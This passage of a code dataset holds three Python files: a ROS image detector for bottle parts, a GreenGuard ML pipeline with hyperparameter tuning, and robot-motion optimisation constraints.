names. The source image topic can be\n        # remapped in the command line. The '~' places the output\n        # image topic under the node name.\n        source_topic = rospy.resolve_name(\"/cam_feed/image_rect_color\")\n        output_topic = rospy.resolve_name(\"~image\")\n        calibration_topic = rospy.resolve_name(\"~calibration_image\")\n        debug_topic = rospy.resolve_name(\"~debug_image\")\n        activation_topic = rospy.resolve_name(\"/activation\")\n        cap_output_topic = rospy.resolve_name(\"/bottle_cap_dets\")\n        band_output_topic = rospy.resolve_name(\"/bottle_band_det\")\n        rim_output_topic = rospy.resolve_name(\"/bottle_rim_det\")\n        target_output_topic = rospy.resolve_name(\"/target_det\")\n\n        this_file_dir = os.path.dirname(os.path.abspath(__file__))\n        ASSETS_PATH = os.path.join(this_file_dir, \"../assets/\")\n\n        self.green_classifier = load(ASSETS_PATH + '134green.joblib')\n        self.pink_classifier = load(ASSETS_PATH + '134pink.joblib')\n        self.orange_classifier = load(ASSETS_PATH + '134orange.joblib')\n\n        first_image = rospy.wait_for_message(source_topic, Image)\n        self.checkCalibrator.calibrate_all(first_image)\n\n        # Subscribe to the source topic. 
Using a queue size of one\n        # means only the most recent message is stored for the next\n        # subscriber callback.\n        rospy.Subscriber(source_topic,\n                         sensor_msgs.msg.Image,\n                         self.process,\n                         queue_size=1)\n\n        # Publish to the output topic.\n        self.publisher = rospy.Publisher(output_topic,\n                                         sensor_msgs.msg.Image,\n                                         queue_size=1)\n\n        # Publish to the activation topic.\n        self.activation_publisher = rospy.Publisher(activation_topic, Activation, queue_size=1)\n\n        # Publish to the cap output topic.\n        self.cap_publisher = rospy.Publisher(cap_output_topic,\n                                             Detection,\n                                             queue_size=1)\n\n        # Publish to the band output topic:\n        self.band_publisher = rospy.Publisher(band_output_topic,Detection,queue_size=1)\n\n        # Publish to the rim output topic:\n        self.rim_publisher = rospy.Publisher(rim_output_topic,Detection,queue_size=1)\n\n        self.target_publisher = rospy.Publisher(target_output_topic,Detection,queue_size=1)\n\n        # Publish to the calibration topic.\n        self.calibration_publisher = rospy.Publisher(calibration_topic,\n                                                     sensor_msgs.msg.Image,\n                                                     queue_size=1)\n\n        # Publish to the debug topic.\n        self.debug_publisher = rospy.Publisher(debug_topic,\n                                               sensor_msgs.msg.Image,\n                                               queue_size=1)\n\n        # Report.\n        rospy.loginfo(\"Detector configured with:\")\n        rospy.loginfo(\"Image source topic: \" + source_topic)\n        rospy.loginfo(\"Image output topic: \" + output_topic)\n        rospy.loginfo(\"Tplink Rect output topic: \" + cap_output_topic)\n\n    def treeThreshold(self, image, classifier):\n        shp = image.shape\n        pixels = image.reshape(-1, 3)\n        out = classifier.predict(pixels)\n        out = out.reshape(shp[0], shp[1], 1)\n        return out\n\n    def test_calibration(self, ros_image):\n        #calibration_image = self.checkCalibrator.calibrate_charucoboard(ros_image)\n        calibration_image = self.checkCalibrator.calibrate_all(ros_image, set_params=False)\n        self.calibration_publisher.publish(\n            self.bridge.cv2_to_imgmsg(calibration_image, \"bgr8\"))\n\n    def detect(self, image, classifier, min_size, max_size, show_mask=False):\n        mask = self.treeThreshold(image, classifier)[:,:,0]\n        # use adaptive thresholding for saturation\n        blur_v = cv2.GaussianBlur(image[:, :, 1],(3, 3),0)\n        #blur_v = image[:, :, 1]\n        # ret, th = cv2.threshold(blur_v, 255, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n        # mask = np.minimum(mask, th)\n        contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n        # ms is needed by the debug prints below even when show_mask is off,\n        # so compute it unconditionally.\n        ms = mask.shape\n        if show_mask:\n            mask[:, ms[1]/2:(ms[1]/2+2)] = 255\n            mask[ms[0]/2:(ms[0]/2+2),:] = 255\n\n        v_image = image[:,:,2]\n        # Otsu's thresholding\n        ret2,th2 = cv2.threshold(v_image,255,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\n        # Otsu's thresholding after Gaussian filtering\n        blur = cv2.GaussianBlur(v_image,(3, 3),0)\n        ret3,th3 = cv2.threshold(blur,255,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\n        print(image[ms[0]/2 - 2:ms[0]/2+2, ms[1]/2 - 2:ms[1]/2+2])\n        #print(v_image[ms[0]/2 - 2:ms[0]/2+2, ms[1]/2 - 2:ms[1]/2+2])\n        print(\"contour areas:\", sorted([cv2.contourArea(c) for c in contours], reverse=True))\n\n        #self.debug_publisher.publish(self.bridge.cv2_to_imgmsg(mask, '8UC1'))\n        self.debug_publisher.publish(self.bridge.cv2_to_imgmsg(mask, '8UC1'))\n        try:\n            #blob = max(contours, key=lambda el: cv2.contourArea(el))\n            # try all blobs since we have a size range\n            for blob in contours:\n                if cv2.contourArea(blob) > min_size and cv2.contourArea(blob) < max_size:\n                    M = cv2.moments(blob)\n                    center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n                    return mask, center, M\n            return mask, None, None\n\n        except ValueError:\n            return mask, None, None\n\n    
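# A minimal, self-contained sketch of the moments-to-centroid step used\n    # in detect() above: for a binary blob, cx = m10/m00 and cy = m01/m00.\n    # (Illustrative only; the blob below is synthetic, not from the node.)\n    #\n    #   import cv2\n    #   import numpy as np\n    #   blob = np.zeros((100, 100), np.uint8)\n    #   cv2.circle(blob, (30, 40), 10, 255, -1)    # filled blob centered at (30, 40)\n    #   M = cv2.moments(blob)\n    #   cx = int(M[\"m10\"] / M[\"m00\"])              # -> 30\n    #   cy = int(M[\"m01\"] / M[\"m00\"])              # -> 40\n\n    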
def process(self, ros_image):\n self.test_calibration(ros_image)\n # Convert into OpenCV image.\n cv_img = self.bridge.imgmsg_to_cv2(ros_image, \"bgr8\")\n\n # Convert to rgb scale.\n rgb_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n\n hsv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2HSV)\n # convert from 360, 100, 100 to 180, 255, 255)\n '''tols = np.array([2, 30, 15]) * 2\n\n cap_picked_color = (200.0 / 2, 75 * 2.55, 55 * 2.55)\n cap_lower = (picked_color[0] - tols[0], picked_color[1] - tols[1], picked_color[2] - tols[2])\n cap_upper = (picked_color[0] + tols[0], picked_color[1] + tols[1], picked_color[2] + tols[2])\n cap_mask = cv2.inRange(hsv_img,lower,upper)\n ms = cap_mask.shape'''\n # mask[:, ms[1]/2] = 255\n # mask[ms[0]/2,:] = 255\n # # print(\"starting\")\n # print(hsv_img[ms[0]/2 - 5:ms[0]/2+5, ms[1]/2 - 5:ms[1]/2+5])\n \n #exit(1)\n #print(np.max(mask), np.min(mask))\n #mask = mask[:ms[0]/2, :ms[1]/2]\n\n '''cap_tols = np.array([5, 30, 15]) * 2\n #cap_picked_color = (200.0 / 2, 75 * 2.55, 55 * 2.55) # old values\n cap_picked_color = (185.0 / 2, 75 * 2.55, 55 * 2.55)\n cap_lower = (cap_picked_color[0] - cap_tols[0], cap_picked_color[1] - cap_tols[1], cap_picked_color[2] - cap_tols[2])\n cap_upper = (cap_picked_color[0] + cap_tols[0], cap_picked_color[1] + cap_tols[1], cap_picked_color[2] + cap_tols[2])\n cap_mask = cv2.inRange(hsv_img,cap_lower,cap_upper)\n cap_ms = cap_mask.shape\n\n band_picked_color = (210 / 2, 85 * 2.55, 50 * 2.55)\n band_tols = np.array([5,20,20]) * 2\n band_lower = (band_picked_color[0] - band_tols[0], band_picked_color[1] - band_tols[1], band_picked_color[2] - band_tols[2])\n band_upper = (band_picked_color[0] + band_tols[0], band_picked_color[1] + band_tols[1], band_picked_color[2] + band_tols[2])\n band_mask = cv2.inRange(hsv_img,band_lower,band_upper)\n band_ms = band_mask.shape\n\n #self.calibration_publisher.publish(self.bridge.cv2_to_imgmsg(mask, '8UC1'))\n cap_contours, _ = cv2.findContours(cap_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n band_contours, _ = cv2.findContours(band_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n #print(\"contours:\", contours)\n found = False\n try:\n band_blob = max(band_contours, key=lambda el: cv2.contourArea(el))\n print(\"largest band blob: \" + str(cv2.contourArea(band_blob)))\n if cv2.contourArea(band_blob) > 100: # magic number for the size of the band\n M = cv2.moments(band_blob)\n detection_type = \"band\"\n found = True\n except ValueError:\n pass\n\n try:\n cap_blob = max(cap_contours, key=lambda el: cv2.contourArea(el))\n print(\"largest cap blob: \" + str(cv2.contourArea(cap_blob)))\n if cv2.contourArea(cap_blob) > 50: # magic number for the size of the cap\n M = cv2.moments(cap_blob)\n detection_type = \"cap\"\n found = True\n except ValueError:\n pass\n '''\n\n #self.calibration_publisher.publish(self.bridge.cv2_to_imgmsg(mask, '8UC1'))\n #cap_contours, _ = cv2.findContours(cap_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n #band_contours, _ = cv2.findContours(band_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n #print(\"contours:\", contours)\n #if len(cap_contours) == 0:\n # print(\"no cap contours found\")\n # return\n #blob = max(cap_contours, key=lambda el: cv2.contourArea(el))\n #M = cv2.moments(blob)\n #center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n '''if found and M is not None:\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n cv2.circle(cv_img, center, 2, (0,0,255), -1)\n uv = np.array((center))\n xw, yw = 
self.checkCalibrator.undistort(uv)\n if detection_type == \"cap\":\n zw = CAP_HEIGHT\n elif detection_type == \"band\":\n zw = BAND_HEIGHT\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n print('x, y, z:', xw[0], yw[0], zw)\n if detection_type == \"cap\":\n self.cap_publisher.publish(detection_msg)\n elif detection_type == \"band\":\n self.band_publisher.publish(detection_msg)\n '''\n\n # TODO REVISIT ACTIVATION\n # on_picked_color = (155 / 2, 53 * 2.55, 48 * 2.55)\n # on_tols = (10, 40, 40)\n # on_mask, on_center, _ = self.detect(hsv_img, on_picked_color, on_tols, 100, 5000)\n\n # active_msg = Activation()\n # if on_center is None:\n # print(\"robot is active!\")\n # active_msg.active = True\n # else:\n # active_msg.active = False\n # self.activation_publisher.publish(active_msg)\n\n \n cap_mask, cap_center, _ = self.detect(\n hsv_img, self.green_classifier, 90, 600,\n show_mask=True)\n\n # old blue\n # band_picked_color = (210 / 2, 85 * 2.55, 50 * 2.55)\n # band_tols = (10,40,40)\n # hot pink\n band_mask, band_center, band_moments = self.detect(\n hsv_img, self.pink_classifier, 200, 1500,\n show_mask=False)\n\n rim_mask, rim_center, rim_moments = self.detect(\n hsv_img, self.pink_classifier, 10, 100,\n show_mask=False)\n\n target_mask, target_center, target_moments = self.detect(\n hsv_img, self.orange_classifier, 200, 100000,\n show_mask=False)\n\n \"\"\"\n Other colors:\n hot pink: 165, 177 (160-180), 142 ( 120-150)\n cap_picked_color = (165, 140, 142)\n cap_tols = (10, 255, 40)\n hot orange: 16, 177 ( 170- 195), 163 (145 - 170)\n\n cap_picked_color = (16, 160, 160)\n cap_tols = (5, 255, 25)\n deep light green 82, 89 ( 75-95), 130 ( 110 - 130)\n light dark green: 82, 155 ( 130-160), 103 ( 90 - 110)\n \"\"\"\n\n if cap_center is not None:\n cv2.circle(cv_img, cap_center, 2, (0, 0, 255), -1)\n uv = np.array((cap_center))\n xw, yw = self.checkCalibrator.undistort_cap(uv)\n # actually 0.2, but we lower it for the sake of the robot\n zw=CAP_HEIGHT - 0.04\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n print('cap x, y, z:', xw[0], yw[0], zw)\n self.cap_publisher.publish(detection_msg)\n if band_center is not None:\n cv2.circle(cv_img, band_center, 2, (0,0,255), -1)\n uv = np.array((band_center))\n xw, yw = self.checkCalibrator.undistort_band(uv)\n zw=BAND_HEIGHT\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n print('band x, y, z:', xw[0], yw[0], zw)\n self.band_publisher.publish(detection_msg)\n if rim_center is not None:\n cv2.circle(cv_img, rim_center, 2, (0,0,255), -1)\n uv = np.array((rim_center))\n xw, yw = self.checkCalibrator.undistort_rim(uv)\n zw=RIM_HEIGHT\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n print('rim x, y, z:', xw[0], yw[0], zw)\n self.rim_publisher.publish(detection_msg)\n if target_center is not None:\n cv2.circle(cv_img, target_center, 2, (0,0,255), -1)\n uv = np.array((target_center))\n xw, yw = self.checkCalibrator.undistort_rim(uv)\n zw=0\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n 
print('target x, y, z:', xw[0], yw[0], zw)\n self.target_publisher.publish(detection_msg)\n\n #if M is not None:\n # center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n # cv2.circle(cv_img, center, 2, (0,0,255), -1)\n #uv = np.array((center))\n #xw, yw = self.checkCalibrator.undistort(uv)\n #zw = 0.16#8 * 0.0254\n #detection_msg = Detection()\n #detection_msg.position = Vector3()\n #detection_msg.position.x = xw\n #detection_msg.position.y = yw\n #detection_msg.position.z = zw\n #print('x, y, z:', xw[0], yw[0], zw)\n #self.tplink_publisher.publish(detection_msg)\n\n '''\n # Run the detector.\n objects = []#self.detector...\n\n # For the fun of it. This should also be published!\n if len(objects) > 0:\n print(objects)\n\n # Indicate the objects in the image.\n for (x,y,w,h) in objects:\n cv2.rectangle(cv_img,(x,y),(x+w,y+h),(255,0,0),2)\n detection_msg = Rect()\n detection_msg.x = x + w/2\n detection_msg.y = y + h/2\n detection_msg.width = w\n detection_msg.height = h\n self.cap_publisher.publish(detection_msg)\n '''\n\n # Convert back into a ROS image and republish (for debugging).\n self.publisher.publish(\n self.bridge.cv2_to_imgmsg(cv_img, \"bgr8\"))\n\n\n#\n# Main Code\n#\nif __name__ == \"__main__\":\n # Prepare the node. You can override the name using the\n # 'rosrun .... __name:=something' convention.\n rospy.init_node('detector')\n\n # Instantiate the Detector object.\n detector = Detector()\n\n # Continually process until shutdown.\n rospy.loginfo(\"Continually processing latest pending images...\")\n rospy.spin()\n\n # Report completion.\n rospy.loginfo(\"Done!\")\n","sub_path":"boogaloo/scripts/pydetectobject.py","file_name":"pydetectobject.py","file_ext":"py","file_size_in_byte":29352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"462213765","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport logging\nimport os\nfrom collections import defaultdict\n\nimport cloudpickle\nimport numpy as np\nfrom btb import HyperParameter\nfrom btb.tuning import GP\nfrom mlblocks import MLPipeline\nfrom sklearn.exceptions import NotFittedError\nfrom sklearn.metrics import accuracy_score, mean_absolute_error, mean_squared_error, r2_score\nfrom sklearn.model_selection import KFold, StratifiedKFold\n\nLOGGER = logging.getLogger(__name__)\n\n\nPIPELINES_DIR = os.path.join(os.path.dirname(__file__), 'pipelines')\n\nMETRICS = {\n 'accuracy': (accuracy_score, False),\n 'r2': (r2_score, False),\n 'mse': (mean_squared_error, True),\n 'mae': (mean_absolute_error, True)\n}\n\n\nclass GreenGuardPipeline(object):\n\n template = None\n fitted = False\n score = None\n\n _cv_class = None\n _metric = None\n _cost = False\n _tuner = None\n _pipeline = None\n\n def _get_cv(self, stratify, cv_splits, shuffle, random_state):\n if stratify:\n cv_class = StratifiedKFold\n else:\n cv_class = KFold\n\n return cv_class(n_splits=cv_splits, shuffle=shuffle, random_state=random_state)\n\n def _load_template(self, template):\n if not os.path.isfile(template):\n template = os.path.join(PIPELINES_DIR, template + '.json')\n\n with open(template, 'r') as template_file:\n return json.load(template_file)\n\n def _load_mlpipeline(self, template):\n if not isinstance(template, dict):\n template = self._load_template(template)\n\n self.template = template\n\n return MLPipeline.from_dict(template)\n\n def __init__(self, template, metric, cost=False, hyperparameters=None,\n stratify=True, cv_splits=5, shuffle=True, random_state=0):\n\n self._cv = self._get_cv(stratify, cv_splits, shuffle, random_state)\n\n if isinstance(metric, str):\n metric, cost = METRICS[metric]\n\n self._metric = metric\n self._cost = cost\n\n self._pipeline = self._load_mlpipeline(template)\n\n if hyperparameters:\n self._pipeline.set_hyperparameters(hyperparameters)\n\n def get_hyperparameters(self):\n return self._pipeline.get_hyperparameters()\n\n def set_hyperparameters(self, hyperparameters):\n self._pipeline.set_hyperparameters(hyperparameters)\n self.fitted = False\n\n @staticmethod\n def _clone_pipeline(pipeline):\n return MLPipeline.from_dict(pipeline.to_dict())\n\n def _is_better(self, score):\n if self._cost:\n return score < self.score\n\n return score > self.score\n\n def _get_tunables(self):\n tunables = []\n tunable_keys = []\n for block_name, params in self._pipeline.get_tunable_hyperparameters().items():\n for param_name, param_details in params.items():\n key = (block_name, param_name)\n param_type = param_details['type']\n param_type = 'string' if param_type == 'str' else param_type\n\n if param_type == 'bool':\n param_range = [True, False]\n else:\n param_range = param_details.get('range') or param_details.get('values')\n\n value = HyperParameter(param_type, param_range)\n tunables.append((key, value))\n tunable_keys.append(key)\n\n return tunables, tunable_keys\n\n def _score_pipeline(self, pipeline, X, y, tables):\n scores = []\n\n for fold, (train_index, test_index) in enumerate(self._cv.split(X, y)):\n LOGGER.debug('Scoring fold %s', fold)\n X_train, X_test = X.iloc[train_index], X.iloc[test_index]\n y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n\n pipeline = self._clone_pipeline(pipeline)\n pipeline.fit(X_train, y_train, **tables)\n\n predictions = pipeline.predict(X_test, **tables)\n score = self._metric(y_test, predictions)\n\n LOGGER.debug('Fold 
%s score: %s', fold, score)\n            scores.append(score)\n\n        return np.mean(scores)\n\n    def _to_dicts(self, hyperparameters):\n\n        params_tree = defaultdict(dict)\n        for (block, hyperparameter), value in hyperparameters.items():\n            if isinstance(value, np.integer):\n                value = int(value)\n\n            elif isinstance(value, np.floating):\n                value = float(value)\n\n            elif isinstance(value, np.ndarray):\n                value = value.tolist()\n\n            elif value == 'None':\n                value = None\n\n            params_tree[block][hyperparameter] = value\n\n        return params_tree\n\n    def _to_tuples(self, params_tree, tunable_keys):\n        param_tuples = defaultdict(dict)\n        for block_name, params in params_tree.items():\n            for param, value in params.items():\n                key = (block_name, param)\n                if key in tunable_keys:\n                    param_tuples[key] = 'None' if value is None else value\n\n        return param_tuples\n\n    def _get_tuner(self):\n        tunables, tunable_keys = self._get_tunables()\n        tuner = GP(tunables)\n\n        # Inform the tuner about the score that the default hyperparameters obtained\n        param_tuples = self._to_tuples(self._pipeline.get_hyperparameters(), tunable_keys)\n        tuner.add(param_tuples, self.score)\n\n        return tuner\n\n    def tune(self, X, y, tables, iterations=10):\n        tables.setdefault('entityset', None)\n        if not self._tuner:\n            LOGGER.info('Scoring the default pipeline')\n            self.score = self._score_pipeline(self._pipeline, X, y, tables)\n            LOGGER.info('Default Pipeline score: %s', self.score)\n\n            self._tuner = self._get_tuner()\n\n        for i in range(iterations):\n            LOGGER.info('Scoring pipeline %s', i + 1)\n\n            params = self._tuner.propose(1)\n            param_dicts = self._to_dicts(params)\n\n            candidate = self._clone_pipeline(self._pipeline)\n            candidate.set_hyperparameters(param_dicts)\n\n            try:\n                score = self._score_pipeline(candidate, X, y, tables)\n\n                LOGGER.info('Pipeline %s score: %s', i + 1, score)\n\n                if self._is_better(score):\n                    self.score = score\n                    self.set_hyperparameters(param_dicts)\n\n                self._tuner.add(params, score)\n\n            except Exception:\n                failed = '\\n'.join('{}: {}'.format(k, v) for k, v in params.items())\n                LOGGER.exception(\"Caught an exception scoring pipeline %s with params:\\n%s\",\n                                 i + 1, failed)\n\n    def fit(self, X, y, tables):\n        tables.setdefault('entityset', None)\n        self._pipeline.fit(X, y, **tables)\n        self.fitted = True\n\n    def predict(self, X, tables):\n        if not self.fitted:\n            raise NotFittedError()\n\n        tables.setdefault('entityset', None)\n        return self._pipeline.predict(X, **tables)\n\n    def save(self, path):\n        with open(path, 'wb') as pickle_file:\n            cloudpickle.dump(self, pickle_file)\n\n    @classmethod\n    def load(cls, path):\n        with open(path, 'rb') as pickle_file:\n            return cloudpickle.load(pickle_file)\n","sub_path":"greenguard/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"32144539","text":"__author__ = 'gleicher'\r\n\r\n\"\"\"\r\nImplements constraints for a specific unit of time - so it can be used for IK\r\n\r\nfor spacetime, you need to associate it with a specific time frame\r\n\r\ncan have multiple scalar constraints, so it outputs 2 lists (eqs, ineqs)\r\nnote that this is the same as Robot.constraint\\\r\n\r\nnote: for a while, there was an idea to make these work as objective terms\r\nas well, however, this got lost (and probably wasn't an important idea)\r\n\"\"\"\r\n\r\nimport adInterface as AD\r\nimport numpy as N\r\nimport math\r\n\r\nclass Constraint:\r\n def __init__(self, eqs, ineqs, noZ):\r\n self.noZ = noZ\r\n self.eqs = eqs\r\n self.ineqs = ineqs\r\n #CB - define bounds as lists (these set defaults and should be overridden by each subclass of Constraint)\r\n self.cUBounds = []\r\n self.cLBounds = []\r\n self.numConstraints = 0 # a Constraint object can actually have more than 1 constraint\r\n\r\n # do we use point information?\r\n self.usesPoints = 1\r\n self.usesPointDerivatives = 0\r\n # do we use state?\r\n self.usesState = 1\r\n self.usesStateDerivatives = 0\r\n\r\n pass\r\n\r\n def getConstInfo(self):\r\n return self.numConstraints, self.cUBounds, self.cLBounds\r\n\r\n def constraint(self, **kwargs):\r\n raise NotImplemented\r\n\r\nclass Nail(Constraint):\r\n \"\"\"\r\n simplest possible constraint - puts a point at a specific position\r\n \"\"\"\r\n def __init__(self, _pointID, _position, _noZ):\r\n Constraint.__init__(self,True,False,_noZ)\r\n self.pointID = _pointID\r\n self.position = _position\r\n #CB - added code to set bounds and numConstraints (for equality uBound == lBound)\r\n if self.noZ:\r\n self.cUBounds = [0,0]\r\n else:\r\n self.cUBounds = [0,0,0]\r\n self.cLBounds = self.cUBounds\r\n assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = len(self.cUBounds)\r\n\r\n def constraint(self, points, **kwargs):\r\n if self.noZ:\r\n return [points[self.pointID][0]-self.position[0],points[self.pointID][1]-self.position[1]], []\r\n else:\r\n return [points[self.pointID][0]-self.position[0],points[self.pointID][1]-self.position[1],points[self.pointID][2]-self.position[2]], []\r\n\r\n def __repr__(self):\r\n return \"\" % (self.pointID, self.position[0], self.position[1], self.position[2])\r\n\r\nclass alignAxis(Constraint):\r\n def __init__(self, _pt, _ax, _vec):\r\n Constraint.__init__(self,1,0,False)\r\n self.pt = _pt\r\n self.ax = _ax\r\n self.vec = _vec\r\n self.numConstraints = 1\r\n\r\n def constraint(self, frames, **kwargs):\r\n return [ 1-N.dot(frames[self.pt][:,self.ax],self.vec) ], []\r\n\r\nclass alignAxisGT(Constraint):\r\n def __init__(self, _pt, _ax, _vec, _gtv=.99):\r\n Constraint.__init__(self,0,1,False)\r\n self.pt = _pt\r\n self.ax = _ax\r\n self.vec = _vec\r\n self.gtv = _gtv\r\n self.numConstraints = 1\r\n def constraint(self, frames, **kwargs):\r\n return [], [ N.dot(frames[self.pt][:,self.ax],self.vec) - self.gtv ]\r\n\r\nclass Marker(Constraint):\r\n \"\"\"\r\n simplest possible constraint - a nail that doesn't actually connect to anything!\r\n \"\"\"\r\n def __init__(self, _position, _noZ=False):\r\n Constraint.__init__(self,True,False,_noZ)\r\n self.position = _position\r\n #CB - added code to set bounds and numConstraints (for equality uBound == lBound)\r\n if self.noZ:\r\n self.cUBounds = [0,0]\r\n else:\r\n self.cUBounds = [0,0,0]\r\n self.cLBounds = self.cUBounds\r\n assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = 0\r\n\r\n def constraint(self, 
**kwargs):\r\n        if self.noZ:\r\n            return [], []\r\n        else:\r\n            return [], []\r\n\r\n    def __repr__(self):\r\n        return \"<Marker (%f, %f, %f)>\" % (self.position[0], self.position[1], self.position[2])\r\n\r\nclass AboveFloor(Constraint):\r\n    \"\"\"\r\n    simplest inequality - only works in Y\r\n    \"\"\"\r\n    def __init__(self, _pointID, _noZ, _floorHeight=0):\r\n        Constraint.__init__(self, False, True, _noZ)\r\n        self.pointID = _pointID\r\n        self.floorHeight = _floorHeight\r\n        #CB - added code to set bounds and numConstraints\r\n        self.cUBounds = [float(\"inf\")]\r\n        self.cLBounds = [0]\r\n        assert len(self.cUBounds) == len(self.cLBounds)\r\n        self.numConstraints = len(self.cUBounds)\r\n\r\n    def constraint(self, points, **kwargs):\r\n        return [], [ points[self.pointID][1]-self.floorHeight ]\r\n\r\nclass VariableBetween(Constraint):\r\n    \"\"\"\r\n    kind of like a joint limit - but implemented as a constraint\r\n    \"\"\"\r\n    def __init__(self, _varID, _minV, _maxV, _noZ):\r\n        Constraint.__init__(self, False, True, _noZ)\r\n        self.varID = _varID\r\n        self.maxV = _maxV\r\n        self.minV = _minV\r\n        #CB - added code to set bounds and numConstraints\r\n        self.cUBounds = [float(\"inf\"), float(\"inf\")]\r\n        self.cLBounds = [0, 0]\r\n        assert len(self.cUBounds) == len(self.cLBounds)\r\n        self.numConstraints = len(self.cUBounds)\r\n\r\n    def constraint(self, state, **kwargs):\r\n        return [], [ state[self.varID]-self.minV, self.maxV-state[self.varID] ]\r\n\r\nclass StateVelocity(Constraint):\r\n    \"\"\"\r\n    makes sure a state variable is less than or equal to a max velocity\r\n    _vMax is max velocity per frame (time parameterize frames outside the constraint)\r\n    \"\"\"\r\n    def __init__(self, _varID, _vMax, noZ=False):\r\n        Constraint.__init__(self, False, True, noZ)\r\n        self.varID = _varID\r\n        self.vMax = _vMax\r\n        self.usesStateDerivatives = 1\r\n        #CB - added code to set bounds and numConstraints\r\n        self.cUBounds = [float(\"inf\")]\r\n        self.cLBounds = [0]\r\n        assert len(self.cUBounds) == len(self.cLBounds)\r\n        self.numConstraints = len(self.cUBounds)\r\n\r\n    def constraint(self, stvel, **kwargs):\r\n        return [], [self.vMax - abs(stvel[self.varID])]\r\n\r\nclass pointDistance(Constraint):\r\n    \"\"\"\r\n    makes sure a point is at least some distance from a fixed location\r\n    \"\"\"\r\n    def __init__(self, _pointID, _r, _x, _y, _z, noZ):\r\n        Constraint.__init__(self, False, True, noZ)\r\n        self.pointID = _pointID\r\n        self.r = _r\r\n        self.x = _x\r\n        self.y = _y\r\n        self.z = _z\r\n        #CB - added code to set bounds and numConstraints\r\n        self.cUBounds = [float(\"inf\")]\r\n        self.cLBounds = [0]\r\n        assert len(self.cUBounds) == len(self.cLBounds)\r\n        self.numConstraints = len(self.cUBounds)\r\n\r\n\r\n    def constraint(self, points, **kwargs):\r\n        dx = self.x - points[self.pointID][0]\r\n        dy = self.y - points[self.pointID][1]\r\n        if self.noZ:\r\n            dst = AD.MATH.sqrt(dx*dx+dy*dy)\r\n        else:\r\n            dz = self.z - points[self.pointID][2]\r\n            dst = AD.MATH.sqrt(dx*dx+dy*dy+dz*dz)\r\n\r\n        return [], [dst - self.r]\r\n\r\nclass allPointsDistance(Constraint):\r\n    \"\"\"\r\n    makes sure all points of a robot are at least some distance from a fixed location\r\n    ignores the first points if you like\r\n    \"\"\"\r\n    def __init__(self, _r, _x, _y, _z, _noZ, _firstPoint=1,numPoints=None):\r\n        Constraint.__init__(self, False, True, _noZ)\r\n        self.first = _firstPoint\r\n        self.r = _r\r\n        self.x = _x\r\n        self.y = _y\r\n        self.z = _z\r\n        #CB - added code to set bounds and numConstraints\r\n        # numPoints has no usable default: [x] * None raises a TypeError,\r\n        # so the caller must always pass the number of constrained points.\r\n        assert numPoints is not None, \"allPointsDistance requires numPoints\"\r\n        self.cUBounds = [float(\"inf\")] * numPoints\r\n        self.cLBounds = [0] * numPoints\r\n        
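# Hypothetical usage sketch (the robot variable below is illustrative,\r\n        # not defined in this file): with _firstPoint=1 the constraint emits\r\n        # one distance inequality per point from index 1 onward, so\r\n        #   allPointsDistance(0.1, 0.0, 0.0, 0.0, False,\r\n        #                     _firstPoint=1, numPoints=len(robot.points)-1)\r\n        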
assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = len(self.cUBounds)\r\n\r\n def constraint(self, points, **kwargs):\r\n lst = []\r\n for i in range(self.first,len(points)):\r\n dx = self.x - points[i][0]\r\n dy = self.y - points[i][1]\r\n if self.noZ:\r\n dst = AD.MATH.sqrt(dx*dx+dy*dy)\r\n else:\r\n dz = self.z - points[i][2]\r\n dst = AD.MATH.sqrt(dx*dx+dy*dy+dz*dz)\r\n lst.append(dst - self.r)\r\n return [], lst\r\n\r\n","sub_path":"RIK_simulator/src/lbd_playback/bin/Spacetime/constraint.py","file_name":"constraint.py","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
